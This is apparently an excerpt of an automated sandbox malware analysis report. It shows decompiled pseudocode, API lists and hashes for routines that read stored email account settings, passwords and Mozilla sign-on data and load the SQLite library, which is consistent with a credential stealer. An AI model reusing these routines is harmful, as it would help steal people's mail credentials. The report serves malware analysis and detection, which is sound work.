                                                              • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                              • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E004106BE(void* __ecx, void* __edx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				int _t58;
                                                              				int _t59;
                                                              				int _t60;
                                                              				int _t61;
                                                              				int _t63;
                                                              				void* _t96;
                                                              				void* _t99;
                                                              				void* _t102;
                                                              				void* _t105;
                                                              				void* _t108;
                                                              				void* _t111;
                                                              				void* _t114;
                                                              				void* _t117;
                                                              				void* _t123;
                                                              				void* _t194;
                                                              				void* _t196;
                                                              				void* _t201;
                                                              				char* _t202;
                                                              
                                                              				_t194 = __edx;
                                                              				_t201 = __ecx;
                                                              				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                              					_t204 = _t201 + 0x460;
                                                              					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                              					_t123 = E00406B74( *_t204);
                                                              					_t195 = _t201 + 0xf84;
                                                              					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                              				}
                                                              				_t202 = _t201 + 0x46c;
                                                              				if(strcmp(_t202, "POP3_Server") == 0) {
                                                              					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0x970;
                                                              					E004060D0(0xff, _t201 + 0x970, _t117);
                                                              				}
                                                              				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                              					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0x970;
                                                              					E004060D0(0xff, _t201 + 0x970, _t114);
                                                              				}
                                                              				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                              					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0x970;
                                                              					E004060D0(0xff, _t201 + 0x970, _t111);
                                                              				}
                                                              				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                              					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0x1084;
                                                              					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                              				}
                                                              				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                              					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0xb70;
                                                              					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                              				}
                                                              				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                              					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0xb70;
                                                              					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                              				}
                                                              				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                              					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0xb70;
                                                              					E004060D0(0xff, _t201 + 0xb70, _t99);
                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                              				}
                                                              				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                              					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                              					_t195 = _t201 + 0x1284;
                                                              					E004060D0(0xff, _t201 + 0x1284, _t96);
                                                              					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                              				}
                                                              				_t58 = strcmp(_t202, "POP3_Password2");
                                                              				_t214 = _t58;
                                                              				if(_t58 == 0) {
                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                              				}
                                                              				_t59 = strcmp(_t202, "IMAP_Password2");
                                                              				_t215 = _t59;
                                                              				if(_t59 == 0) {
                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                              				}
                                                              				_t60 = strcmp(_t202, "NNTP_Password2");
                                                              				_t216 = _t60;
                                                              				if(_t60 == 0) {
                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                              				}
                                                              				_t61 = strcmp(_t202, "SMTP_Password2");
                                                              				_t217 = _t61;
                                                              				if(_t61 == 0) {
                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                              				}
                                                              				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                              					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                              				}
                                                              				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                              				if(_t63 == 0) {
                                                              					_t203 = _t201 + 0x460;
                                                              					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
                                                              					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
                                                              				}
                                                              				_push("SMTP_Port");
                                                              				_t196 = _t201 + 0x46c;
                                                              				_push(_t196);
                                                              				L004115DC();
                                                              				if(_t63 == 0) {
                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                              					 *(_t201 + 0x168c) = _t63;
                                                              				}
                                                              				_push("NNTP_Port");
                                                              				_push(_t196);
                                                              				L004115DC();
                                                              				if(_t63 == 0) {
                                                              					L35:
                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                              					 *(_t201 + 0xf78) = _t63;
                                                              				} else {
                                                              					_push("IMAP_Port");
                                                              					_push(_t196);
                                                              					L004115DC();
                                                              					if(_t63 == 0) {
                                                              						goto L35;
                                                              					} else {
                                                              						_push("POP3_Port");
                                                              						_push(_t196);
                                                              						L004115DC();
                                                              						if(_t63 == 0) {
                                                              							goto L35;
                                                              						}
                                                              					}
                                                              				}
                                                              				_push("SMTP_Secure_Connection");
                                                              				_push(_t196);
                                                              				L004115DC();
                                                              				if(_t63 == 0) {
                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                              					 *(_t201 + 0x1690) = _t63;
                                                              				}
                                                              				_push("NNTP_Secure_Connection");
                                                              				_push(_t196);
                                                              				L004115DC();
                                                              				if(_t63 == 0) {
                                                              					L41:
                                                              					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                              				} else {
                                                              					_push("IMAP_Secure_Connection");
                                                              					_push(_t196);
                                                              					L004115DC();
                                                              					if(_t63 == 0) {
                                                              						goto L41;
                                                              					} else {
                                                              						_push("POP3_Secure_Connection");
                                                              						_push(_t196);
                                                              						L004115DC();
                                                              						if(_t63 == 0) {
                                                              							goto L41;
                                                              						}
                                                              					}
                                                              				}
                                                              				return 1;
                                                              			}























                                                              0x004106be
                                                              0x004106c2
                                                              0x004106de
                                                              0x004106e0
                                                              0x004106f5
                                                              0x004106fe
                                                              0x00410704
                                                              0x0041070a
                                                              0x0041070f
                                                              0x00410715
                                                              0x00410725
                                                              0x0041072d
                                                              0x00410733
                                                              0x00410739
                                                              0x0041073e
                                                              0x0041074e
                                                              0x00410756
                                                              0x0041075c
                                                              0x00410762
                                                              0x00410767
                                                              0x00410777
                                                              0x0041077f
                                                              0x00410785
                                                              0x0041078b
                                                              0x00410790
                                                              0x004107a0
                                                              0x004107a8
                                                              0x004107ae
                                                              0x004107b4
                                                              0x004107b9
                                                              0x004107c9
                                                              0x004107d1
                                                              0x004107d7
                                                              0x004107dd
                                                              0x004107e3
                                                              0x004107e3
                                                              0x004107fc
                                                              0x00410804
                                                              0x0041080a
                                                              0x00410810
                                                              0x00410816
                                                              0x00410816
                                                              0x0041082f
                                                              0x00410837
                                                              0x0041083d
                                                              0x00410843
                                                              0x00410849
                                                              0x00410849
                                                              0x00410862
                                                              0x0041086a
                                                              0x00410870
                                                              0x00410876
                                                              0x0041087c
                                                              0x0041087c
                                                              0x0041088c
                                                              0x00410891
                                                              0x00410895
                                                              0x004108aa
                                                              0x004108aa
                                                              0x004108b5
                                                              0x004108ba
                                                              0x004108be
                                                              0x004108d3
                                                              0x004108d3
                                                              0x004108de
                                                              0x004108e3
                                                              0x004108e7
                                                              0x004108fc
                                                              0x004108fc
                                                              0x00410907
                                                              0x0041090c
                                                              0x00410910
                                                              0x00410925
                                                              0x00410925
                                                              0x00410939
                                                              0x0041094d
                                                              0x00410952
                                                              0x00410959
                                                              0x00410962
                                                              0x00410964
                                                              0x00410979
                                                              0x0041098e
                                                              0x00410993
                                                              0x00410994
                                                              0x00410999
                                                              0x0041099f
                                                              0x004109a0
                                                              0x004109a9
                                                              0x004109b7
                                                              0x004109bd
                                                              0x004109bd
                                                              0x004109c3
                                                              0x004109c8
                                                              0x004109c9
                                                              0x004109d2
                                                              0x004109f6
                                                              0x00410a02
                                                              0x00410a08
                                                              0x004109d4
                                                              0x004109d4
                                                              0x004109d9
                                                              0x004109da
                                                              0x004109e3
                                                              0x00000000
                                                              0x004109e5
                                                              0x004109e5
                                                              0x004109ea
                                                              0x004109eb
                                                              0x004109f4
                                                              0x00000000
                                                              0x00000000
                                                              0x004109f4
                                                              0x004109e3
                                                              0x00410a0e
                                                              0x00410a13
                                                              0x00410a14
                                                              0x00410a1d
                                                              0x00410a2b
                                                              0x00410a31
                                                              0x00410a31
                                                              0x00410a37
                                                              0x00410a3c
                                                              0x00410a3d
                                                              0x00410a46
                                                              0x00410a6a
                                                              0x00410a7c
                                                              0x00410a48
                                                              0x00410a48
                                                              0x00410a4d
                                                              0x00410a4e
                                                              0x00410a57
                                                              0x00000000
                                                              0x00410a59
                                                              0x00410a59
                                                              0x00410a5e
                                                              0x00410a5f
                                                              0x00410a68
                                                              0x00000000
                                                              0x00000000
                                                              0x00410a68
                                                              0x00410a57
                                                              0x00410a89

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcmp$_stricmp$memcpystrlen
                                                              • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                              • API String ID: 1113949926-2499304436
                                                              • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                              • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                              • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                              • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				char _v16;
                                                              				void _v271;
                                                              				char _v272;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				int _t64;
                                                              				int _t66;
                                                              				int _t68;
                                                              				int _t69;
                                                              				int _t72;
                                                              				int _t85;
                                                              				void* _t91;
                                                              				void* _t132;
                                                              				char* _t133;
                                                              				char* _t135;
                                                              				char* _t137;
                                                              				char* _t139;
                                                              				intOrPtr _t151;
                                                              				int _t153;
                                                              				int _t154;
                                                              				void* _t155;
                                                              
                                                              				_t132 = __edx;
                                                              				_v12 = __ecx;
                                                              				_v272 = 0;
                                                              				memset( &_v271, 0, 0xff);
                                                              				_t133 = "mail.account.account";
                                                              				_t64 = strlen(_t133);
                                                              				_t148 = _t64;
                                                              				_t134 = _a4;
                                                              				if(strncmp(_a4, _t133, _t64) != 0) {
                                                              					_v8 = _v8 & 0x00000000;
                                                              				} else {
                                                              					_v8 = E0040C748(_t134,  &_v16, _t148);
                                                              				}
                                                              				if(_v8 != 0) {
                                                              					_push("identities");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t91 == 0) {
                                                              						_t17 = _t155 + 0x604; // 0x604
                                                              						E004060D0(0xff, _t17, _a8);
                                                              					}
                                                              				}
                                                              				_t135 = "mail.server";
                                                              				_t66 = strlen(_t135);
                                                              				_t149 = _t66;
                                                              				_t136 = _a4;
                                                              				if(strncmp(_a4, _t135, _t66) != 0) {
                                                              					_v8 = _v8 & 0x00000000;
                                                              				} else {
                                                              					_v8 = E0040C6F3(_t149, _t136,  &_v272);
                                                              				}
                                                              				if(_v8 != 0) {
                                                              					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                              					_push("username");
                                                              					_push(_v8);
                                                              					_t154 = _t85;
                                                              					L004115B2();
                                                              					if(_t85 == 0) {
                                                              						_t28 = _t154 + 0x204; // 0x204
                                                              						_t85 = E004060D0(0xff, _t28, _a8);
                                                              					}
                                                              					_push("type");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t85 == 0) {
                                                              						_t31 = _t154 + 0x504; // 0x504
                                                              						_t85 = E004060D0(0xff, _t31, _a8);
                                                              					}
                                                              					_push("hostname");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t85 == 0) {
                                                              						_t34 = _t154 + 0x104; // 0x104
                                                              						_t85 = E004060D0(0xff, _t34, _a8);
                                                              					}
                                                              					_push("port");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t85 == 0) {
                                                              						_t85 = atoi(_a8);
                                                              						 *(_t154 + 0x804) = _t85;
                                                              					}
                                                              					_push("useSecAuth");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t85 == 0) {
                                                              						_push("true");
                                                              						_push(_a8);
                                                              						L004115B2();
                                                              						if(_t85 == 0) {
                                                              							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                              						}
                                                              					}
                                                              				}
                                                              				_t137 = "mail.identity";
                                                              				_t68 = strlen(_t137);
                                                              				_t150 = _t68;
                                                              				_t138 = _a4;
                                                              				_t69 = strncmp(_a4, _t137, _t68);
                                                              				if(_t69 != 0) {
                                                              					_v8 = _v8 & 0x00000000;
                                                              				} else {
                                                              					_t69 = E0040C6F3(_t150, _t138,  &_v272);
                                                              					_v8 = _t69;
                                                              				}
                                                              				if(_v8 != 0) {
                                                              					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                              					_push("useremail");
                                                              					_push(_v8);
                                                              					_t153 = _t69;
                                                              					L004115B2();
                                                              					if(_t69 == 0) {
                                                              						_t51 = _t153 + 0x404; // 0x404
                                                              						_t69 = E004060D0(0xff, _t51, _a8);
                                                              					}
                                                              					_push("fullname");
                                                              					_push(_v8);
                                                              					L004115B2();
                                                              					if(_t69 == 0) {
                                                              						_t54 = _t153 + 4; // 0x4
                                                              						_t69 = E004060D0(0xff, _t54, _a8);
                                                              					}
                                                              				}
                                                              				_push("signon.signonfilename");
                                                              				_push(_a4);
                                                              				L004115B2();
                                                              				if(_t69 == 0) {
                                                              					_t151 = _v12;
                                                              					_t139 = _t151 + 0x245;
                                                              					_t152 = _t151 + 0x140;
                                                              					_t72 = strlen(_t151 + 0x140);
                                                              					_t60 = strlen(_a8) + 1; // 0x1
                                                              					if(_t72 + _t60 >= 0x104) {
                                                              						 *_t139 = 0;
                                                              					} else {
                                                              						E004062AD(_t139, _t152, _a8);
                                                              					}
                                                              				}
                                                              				return 1;
                                                              			}


























                                                              0x0040c7cf
                                                              0x0040c7ea
                                                              0x0040c7ed
                                                              0x0040c7f4
                                                              0x0040c7f9
                                                              0x0040c7ff
                                                              0x0040c804
                                                              0x0040c808
                                                              0x0040c816
                                                              0x0040c827
                                                              0x0040c818
                                                              0x0040c822
                                                              0x0040c822
                                                              0x0040c82f
                                                              0x0040c863
                                                              0x0040c868
                                                              0x0040c86b
                                                              0x0040c874
                                                              0x0040c879
                                                              0x0040c87f
                                                              0x0040c884
                                                              0x0040c874
                                                              0x0040c885
                                                              0x0040c88b
                                                              0x0040c890
                                                              0x0040c894
                                                              0x0040c8a2
                                                              0x0040c8b7
                                                              0x0040c8a4
                                                              0x0040c8b2
                                                              0x0040c8b2
                                                              0x0040c8bf
                                                              0x0040c8d2
                                                              0x0040c8d7
                                                              0x0040c8dc
                                                              0x0040c8df
                                                              0x0040c8e1
                                                              0x0040c8ea
                                                              0x0040c8ef
                                                              0x0040c8f5
                                                              0x0040c8fa
                                                              0x0040c8fb
                                                              0x0040c900
                                                              0x0040c903
                                                              0x0040c90c
                                                              0x0040c911
                                                              0x0040c917
                                                              0x0040c91c
                                                              0x0040c91d
                                                              0x0040c922
                                                              0x0040c925
                                                              0x0040c92e
                                                              0x0040c933
                                                              0x0040c939
                                                              0x0040c93e
                                                              0x0040c93f
                                                              0x0040c944
                                                              0x0040c947
                                                              0x0040c950
                                                              0x0040c955
                                                              0x0040c95b
                                                              0x0040c95b
                                                              0x0040c961
                                                              0x0040c966
                                                              0x0040c969
                                                              0x0040c972
                                                              0x0040c974
                                                              0x0040c979
                                                              0x0040c97c
                                                              0x0040c985
                                                              0x0040c987
                                                              0x0040c987
                                                              0x0040c985
                                                              0x0040c972
                                                              0x0040c991
                                                              0x0040c997
                                                              0x0040c99c
                                                              0x0040c9a0
                                                              0x0040c9a4
                                                              0x0040c9ae
                                                              0x0040c9c3
                                                              0x0040c9b0
                                                              0x0040c9b9
                                                              0x0040c9be
                                                              0x0040c9be
                                                              0x0040c9cb
                                                              0x0040c9da
                                                              0x0040c9df
                                                              0x0040c9e4
                                                              0x0040c9e7
                                                              0x0040c9e9
                                                              0x0040c9f2
                                                              0x0040c9f7
                                                              0x0040c9fd
                                                              0x0040ca02
                                                              0x0040ca03
                                                              0x0040ca08
                                                              0x0040ca0b
                                                              0x0040ca14
                                                              0x0040ca19
                                                              0x0040ca1c
                                                              0x0040ca21
                                                              0x0040ca14
                                                              0x0040ca22
                                                              0x0040ca27
                                                              0x0040ca2a
                                                              0x0040ca33
                                                              0x0040ca35
                                                              0x0040ca38
                                                              0x0040ca3e
                                                              0x0040ca45
                                                              0x0040ca54
                                                              0x0040ca5f
                                                              0x0040ca70
                                                              0x0040ca61
                                                              0x0040ca67
                                                              0x0040ca6d
                                                              0x0040ca5f
                                                              0x0040ca7a

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C7F4
                                                              • strlen.MSVCRT ref: 0040C7FF
                                                              • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                              • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                              • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                              • strlen.MSVCRT ref: 0040C88B
                                                              • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                              • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                              • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                              • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                              • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                              • atoi.MSVCRT ref: 0040C955
                                                                • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                              • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                              • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                              • strlen.MSVCRT ref: 0040C997
                                                              • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                              • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                              • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                              • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                              • strlen.MSVCRT ref: 0040CA45
                                                              • strlen.MSVCRT ref: 0040CA4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                              • API String ID: 736090197-593045482
                                                              • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                              • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                              • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                              • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040F64B(intOrPtr* __esi, char* _a4) {
                                                              				void _v283;
                                                              				char _v284;
                                                              				void _v547;
                                                              				char _v548;
                                                              				struct HINSTANCE__* _t45;
                                                              				struct HINSTANCE__* _t46;
                                                              				struct HINSTANCE__* _t57;
                                                              				struct HINSTANCE__* _t68;
                                                              				CHAR* _t79;
                                                              				intOrPtr* _t81;
                                                              
                                                              				_t81 = __esi;
                                                              				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
                                                              					L14:
                                                              					return 1;
                                                              				}
                                                              				_v284 = 0;
                                                              				memset( &_v283, 0, 0x117);
                                                              				if(_a4 == 0) {
                                                              					E0040F435( &_v284);
                                                              				} else {
                                                              					strcpy( &_v284, _a4);
                                                              				}
                                                              				if(_v284 == 0) {
                                                              					_t79 = "sqlite3.dll";
                                                              					_t45 = GetModuleHandleA(_t79);
                                                              					 *(_t81 + 0x24) = _t45;
                                                              					if(_t45 != 0) {
                                                              						goto L12;
                                                              					}
                                                              					_t57 = LoadLibraryA(_t79);
                                                              					goto L11;
                                                              				} else {
                                                              					_v548 = 0;
                                                              					memset( &_v547, 0, 0x104);
                                                              					strcpy( &_v548,  &_v284);
                                                              					strcat( &_v284, "\\sqlite3.dll");
                                                              					if(E0040614B( &_v284) == 0) {
                                                              						strcpy( &_v284,  &_v548);
                                                              						strcat( &_v284, "\\mozsqlite3.dll");
                                                              					}
                                                              					_t68 = GetModuleHandleA( &_v284);
                                                              					 *(_t81 + 0x24) = _t68;
                                                              					if(_t68 != 0) {
                                                              						L12:
                                                              						_t46 =  *(_t81 + 0x24);
                                                              						if(_t46 == 0) {
                                                              							return 0;
                                                              						}
                                                              						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                              						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                              						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                              						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                              						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                              						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                              						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                              						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                              						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                              						goto L14;
                                                              					} else {
                                                              						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                              						L11:
                                                              						 *(_t81 + 0x24) = _t57;
                                                              						goto L12;
                                                              					}
                                                              				}
                                                              			}













                                                              0x0040f64b
                                                              0x0040f65b
                                                              0x0040f7e1
                                                              0x00000000
                                                              0x0040f7e3
                                                              0x0040f66e
                                                              0x0040f674
                                                              0x0040f685
                                                              0x0040f694
                                                              0x0040f687
                                                              0x0040f68b
                                                              0x0040f691
                                                              0x0040f69f
                                                              0x0040f741
                                                              0x0040f747
                                                              0x0040f74f
                                                              0x0040f752
                                                              0x00000000
                                                              0x00000000
                                                              0x0040f755
                                                              0x00000000
                                                              0x0040f6a5
                                                              0x0040f6b2
                                                              0x0040f6b8
                                                              0x0040f6cb
                                                              0x0040f6dc
                                                              0x0040f6f2
                                                              0x0040f702
                                                              0x0040f713
                                                              0x0040f718
                                                              0x0040f722
                                                              0x0040f72a
                                                              0x0040f72d
                                                              0x0040f75e
                                                              0x0040f75e
                                                              0x0040f763
                                                              0x00000000
                                                              0x0040f7ea
                                                              0x0040f77f
                                                              0x0040f78b
                                                              0x0040f798
                                                              0x0040f7a5
                                                              0x0040f7b2
                                                              0x0040f7bf
                                                              0x0040f7cc
                                                              0x0040f7d9
                                                              0x0040f7de
                                                              0x00000000
                                                              0x0040f72f
                                                              0x0040f739
                                                              0x0040f75b
                                                              0x0040f75b
                                                              0x00000000
                                                              0x0040f75b
                                                              0x0040f72d

                                                              APIs
                                                              • memset.MSVCRT ref: 0040F674
                                                              • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                              • memset.MSVCRT ref: 0040F6B8
                                                              • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                              • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                              • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                              • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                              • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                              • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                              • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                              • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                              • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                              • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                              • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                              • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                              • API String ID: 3567885941-2042458128
                                                              • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                              • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                              • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                              • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
